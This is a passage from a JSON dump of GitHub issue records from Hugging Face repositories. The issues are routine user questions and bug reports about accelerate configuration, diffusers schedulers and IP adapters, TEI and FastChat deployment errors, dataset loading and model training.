    "body": "Hello everyone!\r\n\r\nCould you please advise how to replace the console command for setting a config\r\n```\r\naccelerate launch --config_file {path/to/config/my_config_file.yaml} {script_name.py} {--arg1} {--arg2}\r\n```\r\nwith code in the Python file script_name.py?\r\n\r\nI am expecting something like the following functionality:\r\n```\r\nfrom accelerate import Accelerator\r\naccelerator = Accelerator()\r\naccelerator.set_config_file('path/to/config/my_config_file.yaml')\r\n```\r\n\r\nI would like to run the script through Python and use all the benefits of launching with the Accelerate launch command with config file:\r\n```\r\npython script_name.py\r\n```\r\n",
    "url": "https://github.com/huggingface/accelerate/issues/2891",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-25T11:56:10Z",
    "updated_at": "2024-10-07T15:08:01Z",
    "user": "konstantinator"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8693,
    "title": "SD3 + SDXL refine fix lying on grass. How to do in diffusers colab workflow?",
    "body": "this is comfy workflow \r\n![GQQC1T-aUAAXRDI](https://github.com/huggingface/diffusers/assets/151509142/15e3c420-3e14-4476-8a1a-4001934af158)\r\n\r\nhow can i do in diffusers colab workflow?",
    "url": "https://github.com/huggingface/diffusers/issues/8693",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2024-06-25T07:30:55Z",
    "updated_at": "2024-09-23T11:37:25Z",
    "user": "s9anus98a"
  },
  {
    "repo": "huggingface/text-generation-inference",
    "number": 2113,
    "title": "how to launch a service using downloaded model weights?",
    "body": "### System Info\r\n\r\nI have downloaded model weights of bge-models, and I want to launch a model service using TGI, the command is :\r\n```\r\nmodel=/storage/nfs2/ModelHub/embedding/BAAI/bge-small-zh-v1.5\r\nrevision=refs/pr/5\r\nvolume=$PWD/data # share a volume with the Docker container to avoid downloading weights every run\r\n\r\ndocker run --gpus all \\\r\n-p 3001:3001 -v $volume:/data text-embeddings-inference:1.2 \\\r\n--model-id $model --port 3001 --revision $revision\r\n```\r\nbut I got the follwing error:\r\n\r\n```\r\n2024-06-25T03:13:34.201754Z  INFO text_embeddings_router: router/src/main.rs:140: Args { model_id: \"BAA*/***-*****-**-v1.5\", revision: Some(\"refs/pr/5\"), tokenization_workers: None, dtype: None, pooling: None, max_concurrent_requests: 512, max_batch_tokens: 16384, max_batch_requests: None, max_client_batch_size: 32, auto_truncate: false, hf_api_token: None, hostname: \"54903bb17567\", port: 3001, uds_path: \"/tmp/text-embeddings-inference-server\", huggingface_hub_cache: Some(\"/data\"), payload_limit: 2000000, api_key: None, json_output: false, otlp_endpoint: None, cors_allow_origin: None }\r\n2024-06-25T03:13:34.201950Z  INFO hf_hub: /root/.cargo/git/checkouts/hf-hub-1aadb4c6e2cbe1ba/b167f69/src/lib.rs:55: Token file not found \"/root/.cache/huggingface/token\"\r\n2024-06-25T03:13:36.546198Z  INFO download_artifacts: text_embeddings_core::download: core/src/download.rs:20: Starting download\r\nError: Could not download model artifacts\r\n\r\nCaused by:\r\n    0: request error: error sending request for url (https://huggingface.co/BAAI/bge-large-zh-v1.5/resolve/refs%2Fpr%2F5/config.json): error trying to connect: Connection reset by peer (os error 104)\r\n    1: error sending request for url (https://huggingface.co/BAAI/bge-large-zh-v1.5/resolve/refs%2Fpr%2F5/config.json): error trying to connect: Connection reset by peer (os error 104)\r\n    2: error trying to connect: Connection reset by peer (os error 104)\r\n    3: Connection reset by peer (os error 104)\r\n    4: Connection reset by peer (os error 104)\r\n```\r\nIt seems to download model from huggingface but I want to use my private model weight.\r\nmy privatre weight:\r\n\r\n```\r\n>> ls /storage/nfs2/ModelHub/embedding/BAAI/bge-small-zh-v1.5\r\n1_Pooling                          model.safetensors  README.md                  tokenizer_config.json\r\nconfig.json                        modules.json       sentence_bert_config.json  tokenizer.json\r\nconfig_sentence_transformers.json  pytorch_model.bin  special_tokens_map.json    vocab.txt\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [X] Docker\r\n- [ ] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [X] An officially supported command\r\n- [ ] My own modifications\r\n\r\n### Reproduction\r\n\r\ndocker run --gpus all \\\r\n-p 3001:3001 -v $volume:/data text-embeddings-inference:1.2 \\\r\n--model-id $model --port 3001 --revision $revision\r\n\r\n### Expected behavior\r\n\r\nluanch the service successfully",
    "url": "https://github.com/huggingface/text-generation-inference/issues/2113",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-25T03:18:14Z",
    "updated_at": "2024-06-28T03:50:10Z",
    "user": "chenchunhui97"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1302,
    "title": "Assistant feature: Send user query as part of template variable GET request",
    "body": "Trying to integrate RAG as an assistant. Thinking of using a template variable that makes a GET request (with the prompt as the request body), to get the relevant documents as context. Is this possible (i.e. there is a special variable in the system prompt page for the user query), or is there a better way of doing this?",
    "url": "https://github.com/huggingface/chat-ui/issues/1302",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-24T22:27:02Z",
    "updated_at": "2025-01-02T12:09:23Z",
    "comments": 2,
    "user": "ethayu"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8683,
    "title": "Why do Diffusers schedulers produce lower quality outputs compared to ComfyUI?",
    "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/8682\r\n\r\nOriginally posted by **nducthang** June 24, 2024\r\nHi,\r\n\r\nI'm encountering an issue when comparing the quality of ComfyUI and Diffusers. I've noticed that the output of Diffusers is consistently lower than ComfyUI in many cases, despite using the same settings and seed. For the base Diffusers, I've utilized: https://github.com/huggingface/diffusers/blob/main/examples/community/lpw_stable_diffusion_xl.py.\r\n\r\nUpon closer inspection, I've identified differences in the scheduler/ksampler between the two base codes. I've also observed variations in CLIP Embedding between the two base codes, but in my experiments, this hasn't significantly impacted the output. The main issue seems to lie with the KSampler.\r\n\r\nHas anyone else encountered this issue or have any ideas on improving the Scheduler algorithm of Diffusers?\r\n\r\nHere are some prompts I've experimented:\r\nModel: RVXL - Size: (896, 1152)\r\nPositive prompt:\r\n```\r\nfemale, attractive woman, pretty middle-aged woman, thick hair, (((Caucasian, European, Scandinavian female))), ((hazel eyes, HazelEyed)). (Brunette (Light-Brown-Hair)), ((((long rectangular face, elongated face, oblong face shape, angular chiseled face)), ((wide jaw, big strong chin)))). (((1980s magazine advertisement. Living room. CRT Televesion. 1980s aesthetic. 1980s interior design.))) [object Object] . high quality, dim lighting, soft lighting, sharp focus, f5.6, dslr, High Detail, detailed, ((wide shot))\r\n```\r\nNegative prompt:\r\n```\r\n(((male))), (small chin, receding-chin, puffy face), (((Asian, Chinese, Korean, Japanese, Indian, Pakistani, Black, African, Persian, Arab, Middle Eastern, Hispanic, Latino))), (small chin, receding-chin, puffy face), (blurry), (BadDream:1.2), (UnrealisticDream:1.2), ((bad-hands-5)), (strabismus, cross-eyed:1.2), (signature, watermark, name), (worst quality, poor quality, low quality), ((deformed)), (extra limbs), (extra arms), (extra legs), disfigured, malformed, (nude:1.4), (naked:1.4), (nsfw:1.4), (bikini:1.4), (lingerie:1.4), (underwear:1.4), (teen:1.4), (tween:1.4), (teenage:1.4), (kid:1.6), (child:1.6), (topless, shirtless:1.4), (((greyscale))), (cleavage:1.2), (nipples:1.4)\r\n```",
    "url": "https://github.com/huggingface/diffusers/issues/8683",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-24T14:37:19Z",
    "updated_at": "2024-06-25T06:06:12Z",
    "comments": 20,
    "user": "nducthang"
  },
  {
    "repo": "huggingface/alignment-handbook",
    "number": 174,
    "title": "Question about torch_dtype when runnging run_orpo.py",
    "body": "I have been using `run_orpo.py` with my personal data successfully. However, as I use it, I have a question.\r\n\r\nWhen I look at the code for `run_orpo.py`, I see that there is a code to match torch_dtype to the dtype of the pretrained model. However, when I actually train and save the model, even if the pretrained model's dtype was `bf16`, it gets changed to `fp32`. Why is this happening?",
    "url": "https://github.com/huggingface/alignment-handbook/issues/174",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-23T08:28:02Z",
    "updated_at": "2024-07-30T05:05:03Z",
    "comments": 6,
    "user": "sylee96"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8666,
    "title": "Attention api changes no documentation ? ",
    "body": "how can i see ur previous changes on attention ? \r\n\r\nu have rename`` _slice_size , _sliced_attention and _attention``  attribute from attention \r\n\r\nneed to know what are alternative using of its ? ",
    "url": "https://github.com/huggingface/diffusers/issues/8666",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-23T07:08:58Z",
    "updated_at": "2024-06-23T11:31:47Z",
    "comments": 4,
    "user": "xalteropsx"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 819,
    "title": "Blog on walkthrough with transformers js",
    "body": "### Question\n\nHey, So I am writing this blog part of sharing knowledge in a blog series called Running AI/ML in the client. I am using transformer js example walkthrough in this part to validate some concepts. Can I get some feedback before it goes live? How do we connect?",
    "url": "https://github.com/huggingface/transformers.js/issues/819",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-23T06:06:42Z",
    "updated_at": "2024-06-27T19:10:05Z",
    "user": "ArijitCloud"
  },
  {
    "repo": "huggingface/trl",
    "number": 1763,
    "title": "What is the difference between PPOv2Trainer and PPOTrainer?",
    "body": "What is the difference between PPOv2Trainer and PPOTrainer?  And in trl\\examples\\scripts\\ppo\\ppo.py and trl\\examples\\scripts\\ppo.py , there are two dpo.py files, can you tell me what is different between them?",
    "url": "https://github.com/huggingface/trl/issues/1763",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-22T14:48:38Z",
    "updated_at": "2024-08-24T09:25:52Z",
    "user": "mst272"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8649,
    "title": "SD3 - num_images_per_prompt no longer honoured (throws error)",
    "body": "### Describe the bug\n\nWith models prior to SD3, the parameter num_images_per_prompt is honoured, enabling generation of several images per prompt. With sd3-medium an error is generated.\r\nRuntimeError: Sizes of tensors must match except in dimension 1. Expected size 2 but got size 1 for tensor number 1 in the list.\r\nNote: I have insufficient VRAM to run tests without clearing text_encoder_3 and tokenizer_3 and am not sure how to use the \r\nsd3_medium_incl_clips_t5xxlfp8.safetensors variant in a normal diffusers workflow.  It is always possible that clearing the T5-xxl has a side-effect of breaking num_images_per_prompt.\n\n### Reproduction\n\n```\r\nimport torch\r\nfrom diffusers import StableDiffusion3Pipeline\r\n\r\npipe = StableDiffusion3Pipeline.from_pretrained(\r\n    \"stabilityai/stable-diffusion-3-medium-diffusers\",\r\n    text_encoder_3=None,\r\n    tokenizer_3=None,\r\n    torch_dtype=torch.float16\r\n)\r\npipe.to(\"cuda\")\r\n\r\nimage = pipe(\r\n    \"A cat holding a sign that says hello world\",\r\n    negative_prompt=\"\",\r\n    num_inference_steps=28,\r\n    num_images_per_prompt=2,\r\n    guidance_scale=7.0,\r\n).images[0]\r\nimage.save(\"sd3_hello_world-no-T5.png\")\r\n```\n\n### Logs\n\n```shell\nTraceback (most recent call last):\r\n  File \"/home/developer/src/hug_test_txt2img_sd3.py\", line 12, in \r\n    image = pipe(\r\n  File \"/usr/local/lib/python3.10/dist-packages/torch/utils/_contextlib.py\", line 115, in decorate_context\r\n    return func(*args, **kwargs)\r\n  File \"/usr/local/lib/python3.10/dist-packages/diffusers/pipelines/stable_diffusion_3/pipeline_stable_diffusion_3.py\", line 778, in __call__\r\n    ) = self.encode_prompt(\r\n  File \"/usr/local/lib/python3.10/dist-packages/diffusers/pipelines/stable_diffusion_3/pipeline_stable_diffusion_3.py\", line 413, in encode_prompt\r\n    prompt_embeds = torch.cat([clip_prompt_embeds, t5_prompt_embed], dim=-2)\r\nRuntimeError: Sizes of tensors must match except in dimension 1. Expected size 2 but got size 1 for tensor number 1 in the list.\n```\n\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.29.0\r\n- Platform: Linux-6.8.0-35-generic-x86_64-with-glibc2.35\r\n- Running on a notebook?: No\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.12\r\n- PyTorch version (GPU?): 2.3.1+cu121 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.23.4\r\n- Transformers version: 4.41.2\r\n- Accelerate version: 0.31.0\r\n- PEFT version: 0.11.1\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.3\r\n- xFormers version: 0.0.27+133d7f1.d20240619\r\n- Accelerator: NVIDIA GeForce RTX 3060, 12288 MiB VRAM\r\n- Using GPU in script?: yes\r\n- Using distributed or parallel set-up in script?: no\r\n\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/8649",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2024-06-20T11:28:22Z",
    "updated_at": "2024-06-29T13:05:28Z",
    "comments": 4,
    "user": "zagglez"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 814,
    "title": "Consultation on the use of the library with chatbot models",
    "body": "### Question\n\nHello, Greetings Vladimir, programmer in a web environment with PHP, JS, AJAX, first I apologize for my English, my native language is Latin Spanish, I am not very good at writing it, I have used a translator, I wanted to consult, how can I use this interesting and useful tool, to be able to create a chatbot that can respond with personalized information from PDFs, the query is more like using the library, how to use the models both from Hugging Face and downloaded from the script that you share in the documentation and which models would be the most useful for this task considering that you will have to speak in Spanish, I remain attentive",
    "url": "https://github.com/huggingface/transformers.js/issues/814",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-20T03:24:34Z",
    "updated_at": "2024-07-29T10:47:24Z",
    "user": "mate07"
  },
  {
    "repo": "huggingface/optimum",
    "number": 1912,
    "title": "Could you provide the official onnx model of Qwen-VL-Chat(-Int4)?",
    "body": "### Feature request\n\nQwen-VL-Chat(-Int4) is useful to image-to-text model.\n\n### Motivation\n\nThe image-to-text LMM model just like Qwen-VL-Chat(-Int4) is very useful.\n\n### Your contribution\n\nNot yet.",
    "url": "https://github.com/huggingface/optimum/issues/1912",
    "state": "open",
    "labels": [
      "feature-request",
      "quantization"
    ],
    "created_at": "2024-06-19T08:43:58Z",
    "updated_at": "2024-10-09T07:52:54Z",
    "comments": 0,
    "user": "yzq1990"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8626,
    "title": "More thorough guidance for multiple IP adapter images/masks and a single IP Adapter",
    "body": "### Describe the bug\r\n\r\nI'm trying to use a single IP adapter with multiple IP adapter images and masks. This section of the docs gives an example of how I could do that: https://huggingface.co/docs/diffusers/v0.29.0/en/using-diffusers/ip_adapter#ip-adapter-masking\r\n\r\nThe docs provide the following code:\r\n```python\r\nfrom diffusers.image_processor import IPAdapterMaskProcessor\r\n\r\nmask1 = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/diffusers/ip_mask_mask1.png\")\r\nmask2 = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/diffusers/ip_mask_mask2.png\")\r\n\r\noutput_height = 1024\r\noutput_width = 1024\r\n\r\nprocessor = IPAdapterMaskProcessor()\r\nmasks = processor.preprocess([mask1, mask2], height=output_height, width=output_width)\r\n\r\npipeline.load_ip_adapter(\"h94/IP-Adapter\", subfolder=\"sdxl_models\", weight_name=[\"ip-adapter-plus-face_sdxl_vit-h.safetensors\"])\r\npipeline.set_ip_adapter_scale([[0.7, 0.7]])  # one scale for each image-mask pair\r\n\r\nface_image1 = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/diffusers/ip_mask_girl1.png\")\r\nface_image2 = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/diffusers/ip_mask_girl2.png\")\r\n\r\nip_images = [[face_image1, face_image2]]\r\n\r\nmasks = [masks.reshape(1, masks.shape[0], masks.shape[2], masks.shape[3])]\r\n\r\ngenerator = torch.Generator(device=\"cpu\").manual_seed(0)\r\nnum_images = 1\r\n\r\nimage = pipeline(\r\n    prompt=\"2 girls\",\r\n    ip_adapter_image=ip_images,\r\n    negative_prompt=\"monochrome, lowres, bad anatomy, worst quality, low quality\",\r\n    num_inference_steps=20,\r\n    num_images_per_prompt=num_images,\r\n    generator=generator,\r\n    cross_attention_kwargs={\"ip_adapter_masks\": masks}\r\n).images[0]\r\n```\r\n\r\nOne important point that should be highlighted is that images/scales/masks must be _lists of lists_ , otherwise we get the following error: `Cannot assign 2 scale_configs to 1 IP-Adapter`. \r\n\r\nThat error message is intuitive enough, however this gets confusing in other sections of the documentation, such as the `set_ip_adapter_scale()` function:\r\n```python\r\n# To use original IP-Adapter\r\nscale = 1.0\r\npipeline.set_ip_adapter_scale(scale)\r\n\r\n# To use style block only\r\nscale = {\r\n    \"up\": {\"block_0\": [0.0, 1.0, 0.0]},\r\n}\r\npipeline.set_ip_adapter_scale(scale)\r\n\r\n# To use style+layout blocks\r\nscale = {\r\n    \"down\": {\"block_2\": [0.0, 1.0]},\r\n    \"up\": {\"block_0\": [0.0, 1.0, 0.0]},\r\n}\r\npipeline.set_ip_adapter_scale(scale)\r\n\r\n# To use style and layout from 2 reference images\r\nscales = [{\"down\": {\"block_2\": [0.0, 1.0]}}, {\"up\": {\"block_0\": [0.0, 1.0, 0.0]}}]\r\npipeline.set_ip_adapter_scale(scales)\r\n```\r\n\r\nIs it possible to use the style and layout from 2 reference images _with a single IP Adapter_?\r\nI tried doing something like the following, which _builds on the knowledge of needing to use a list of lists_:\r\n```python\r\n# List of lists to support multiple images/scales/masks with a single IP Adapter\r\nscales = [[{\"down\": {\"block_2\": [0.0, 1.0]}}, {\"up\": {\"block_0\": [0.0, 1.0, 0.0]}}]]\r\npipeline.set_ip_adapter_scale(scales)\r\n\r\n# OR\r\n\r\n# Use layout and style from InstantStyle for one image, but also use a numerical scale value for the other\r\nscale = {\r\n    \"down\": {\"block_2\": [0.0, 1.0]},\r\n    \"up\": {\"block_0\": [0.0, 1.0, 0.0]},\r\n}\r\npipeline.set_ip_adapter_scale([[0.5, scale]])\r\n```\r\n\r\nbut I get the following error:\r\n```\r\nTypeError: unsupported operand type(s) for *: 'dict' and 'Tensor'\\n\r\nAt:\r\n /usr/local/lib/python3.10/dist-packages/diffusers/models/attention_processor.py(2725): __call__\r\n/usr/local/lib/python3.10/dist-packages/diffusers/models/attention_processor.py(549): forward\r\n/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\r\n/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1518): _wrapped_call_impl\\n  /usr/local/lib/python3.10/dist-packages/diffusers/models/attention.py(366): forward\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1518): _wrapped_call_impl\\n  /usr/local/lib/python3.10/dist-packages/diffusers/models/transformers/transformer_2d.py(440): forward\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1518): _wrapped_call_impl\\n  /usr/local/lib/python3.10/dist-packages/diffusers/models/unets/unet_2d_blocks.py(1288): forward\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1518): _wrapped_call_impl\\n  /usr/local/lib/python3.10/dist-packages/diffusers/models/unets/unet_2d_condition.py(1220): forward\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/mod",
    "url": "https://github.com/huggingface/diffusers/issues/8626",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2024-06-18T18:06:37Z",
    "updated_at": "2024-09-23T11:36:10Z",
    "comments": 11,
    "user": "chrismaltais"
  },
  {
    "repo": "huggingface/datasets",
    "number": 6979,
    "title": "How can I load partial parquet files only?",
    "body": "I have a HUGE dataset about 14TB, I unable to download all parquet all. I just take about 100 from it.\r\n\r\ndataset = load_dataset(\"xx/\", data_files=\"data/train-001*-of-00314.parquet\")\r\n\r\nHow can I just using 000 - 100 from a 00314 from all partially?\r\n\r\nI search whole net didn't found a solution, **this is stupid if they didn't support it, and I swear I wont using stupid parquet any more**\r\n",
    "url": "https://github.com/huggingface/datasets/issues/6979",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-18T15:44:16Z",
    "updated_at": "2024-06-21T17:09:32Z",
    "comments": 12,
    "user": "lucasjinreal"
  },
  {
    "repo": "huggingface/pytorch-image-models",
    "number": 2211,
    "title": "How to Replicate Official Model Accuracy",
    "body": "Based on the accuracy provided by the official source, how can one replicate and train these models? \r\n\r\nFor example, for mobilenetv4_hybrid_large.e600_r384_in1k with a top-1 accuracy of 84.266\r\n\r\nwhere can one find the training hyperparameters such as epochs, scheduler, warmup epochs, learning rate, batch size, and other parameters to replicate the model's performance?",
    "url": "https://github.com/huggingface/pytorch-image-models/issues/2211",
    "state": "closed",
    "labels": [
      "enhancement"
    ],
    "created_at": "2024-06-18T05:30:59Z",
    "updated_at": "2024-06-24T23:36:45Z",
    "user": "usergxx"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1290,
    "title": "ERROR:    Exception in ASGI application",
    "body": "Hello everyone, I have the following problem when using Huggingface ChatUI with FastChat. How can I change the configuration? Use npm to start development mode.\r\nThanks\r\n```\r\nMODELS=`[\r\n  {\r\n    \"name\": \"Infinirc-7b-Llama2\",\r\n    \"id\": \"Infinirc-7b-Llama2\",\r\n    \"model\": \"Infinirc-7b-Llama2\",\r\n    \"parameters\": {\r\n      \"temperature\": 0.9,\r\n      \"top_p\": 0.95,\r\n      \"repetition_penalty\": 1.2,\r\n      \"top_k\": 50,\r\n      \"truncate\": 1000,\r\n      \"max_new_tokens\": 1024,\r\n      \"stop\": []\r\n    },\r\n    \"endpoints\": [{\r\n      \"type\" : \"openai\",\r\n      \"baseURL\": \"http://69.30.85.183:22152/v1\",\r\n      \r\n      \"accessToken\": \"x\"\r\n\r\n    }]\r\n  }\r\n]`\r\n```\r\n\r\nFastChat:\r\n```\r\n`2024-06-18 01:07:42 | INFO | stdout | INFO:     59.125.15.126:60166 - \"POST /v1/chat/completions HTTP/1.1\" 500 Internal Server Error\r\n2024-06-18 01:07:42 | ERROR | stderr | ERROR:    Exception in ASGI application\r\n2024-06-18 01:07:42 | ERROR | stderr | Traceback (most recent call last):\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/uvicorn/protocols/http/httptools_impl.py\", line 399, in run_asgi\r\n2024-06-18 01:07:42 | ERROR | stderr |     result = await app(  # type: ignore[func-returns-value]\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/uvicorn/middleware/proxy_headers.py\", line 70, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     return await self.app(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/fastapi/applications.py\", line 1054, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await super().__call__(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/applications.py\", line 123, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.middleware_stack(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/middleware/errors.py\", line 186, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     raise exc\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/middleware/errors.py\", line 164, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.app(scope, receive, _send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/middleware/cors.py\", line 85, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.app(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/middleware/exceptions.py\", line 65, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/_exception_handler.py\", line 64, in wrapped_app\r\n2024-06-18 01:07:42 | ERROR | stderr |     raise exc\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/_exception_handler.py\", line 53, in wrapped_app\r\n2024-06-18 01:07:42 | ERROR | stderr |     await app(scope, receive, sender)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 756, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.middleware_stack(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 776, in app\r\n2024-06-18 01:07:42 | ERROR | stderr |     await route.handle(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 297, in handle\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.app(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 77, in app\r\n2024-06-18 01:07:42 | ERROR | stderr |     await wrap_app_handling_exceptions(app, request)(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/_exception_handler.py\", line 64, in wrapped_app\r\n2024-06-18 01:07:42 | ERROR | stderr |     raise exc\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/_exception_handler.py\", line 53, in wrapped_app\r\n2024-06-18 01:07:42 | ERROR | stderr |     await app(scope, receive, sender)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 72, in app\r\n2024-06-18 01:07:42 | ERROR | stderr |     response = await func(request)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/fastapi/routing.py\", line 278, in app\r\n2024-06-18 01:07:42 | ERROR | stderr |     raw_response = await run_endpoint_function(\r\n2024-06-18 01:07:42 | ERRO",
    "url": "https://github.com/huggingface/chat-ui/issues/1290",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-18T02:07:50Z",
    "updated_at": "2024-06-23T13:26:59Z",
    "comments": 1,
    "user": "rickychen-infinirc"
  },
  {
    "repo": "huggingface/autotrain-advanced",
    "number": 684,
    "title": "Where is the fine-tuned model output?",
    "body": "I\u2019m new to using AutoTrain on Hugging Face and I encountered an issue during my first attempt at fine-tuning a model. I have a free account, because I want to see whether I can get something to work before I start paying for training. Here\u2019s a summary of what I did and the problem I\u2019m facing:\r\nTraining Configuration:\r\nI trained using Mistral-7B-Instruct-v0.2 and also openai-community/gpt2.\r\nDataset: I uploaded a tiny JSONL file (24 records) with a single \u201ctext\u201d field for training.\r\nTraining Parameters: I set the training to run for one epoch.\r\nTraining Process:\r\nThe training ran for a couple of seconds.\r\nI received a message that the space was paused, which I assumed meant the training had completed.\r\nIssue:\r\nAfter the training supposedly completed, I can\u2019t find any output files or trained models.\r\nI checked all available tabs and sections in the AutoTrain interface but didn\u2019t see anything labeled \u201cModels,\u201d \u201cArtifacts,\u201d \u201cResults,\u201d or similar.\r\nI reviewed the logs but didn\u2019t find any clear indications of where the output is stored.\r\nI checked my Hugging Face profile under the \u201cModels\u201d heading, but it says \u201cNone yet.\u201d\r\nQuestions:\r\nWhere should I look in the AutoTrain interface to find the trained model and output files?\r\nAre there any additional steps I need to take to ensure the trained model is saved and accessible?\r\nWith a free account, I don\u2019t have any GPUs assigned. But is that a problem with only 24 short training samples and one epoch?\r\nAny guidance or tips would be greatly appreciated!\r\n",
    "url": "https://github.com/huggingface/autotrain-advanced/issues/684",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-17T23:01:53Z",
    "updated_at": "2024-06-22T03:49:27Z",
    "user": "RonPisaturo"
  },
  {
    "repo": "huggingface/transformers",
    "number": 31453,
    "title": "How to build and evaluate a vanilla transformer?",
    "body": "### Model description\n\n\"Attention Is All You Need\" is a landmark 2017 research paper authored by eight scientists working at Google, responsible for expanding 2014 attention mechanisms proposed by Bahdanau et al. into a new deep learning architecture known as the transformer with an encoder, cross-attention, and a decoder.\n\n### Open source status\n\n- [X] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\nEncoderDecoderModels are supported via the huggingface API. Though it isn't possible to evaluate them properly: https://github.com/huggingface/transformers/issues/28721\r\nHow is it possible to build and evaluate a vanilla transformer with an encoder, cross-attention, and a decoder in huggingface?",
    "url": "https://github.com/huggingface/transformers/issues/31453",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-17T17:17:11Z",
    "updated_at": "2024-11-04T13:56:06Z",
    "user": "Bachstelze"
  },
  {
    "repo": "huggingface/parler-tts",
    "number": 74,
    "title": "How to do with flan-t5 when i want to finetune based on  Mini v0.1 but not from scratch? Flan t5 can not deal my language.",
    "body": "",
    "url": "https://github.com/huggingface/parler-tts/issues/74",
    "state": "open",
    "labels": [],
    "created_at": "2024-06-17T06:39:24Z",
    "updated_at": "2024-06-17T06:39:24Z",
    "user": "lyt719"
  },
  {
    "repo": "huggingface/candle",
    "number": 2269,
    "title": "How to select which GPU to use",
    "body": "We are working with the stable diffusion example. How do we select which GPU device on our system to use for the rendering?\r\nthanks.",
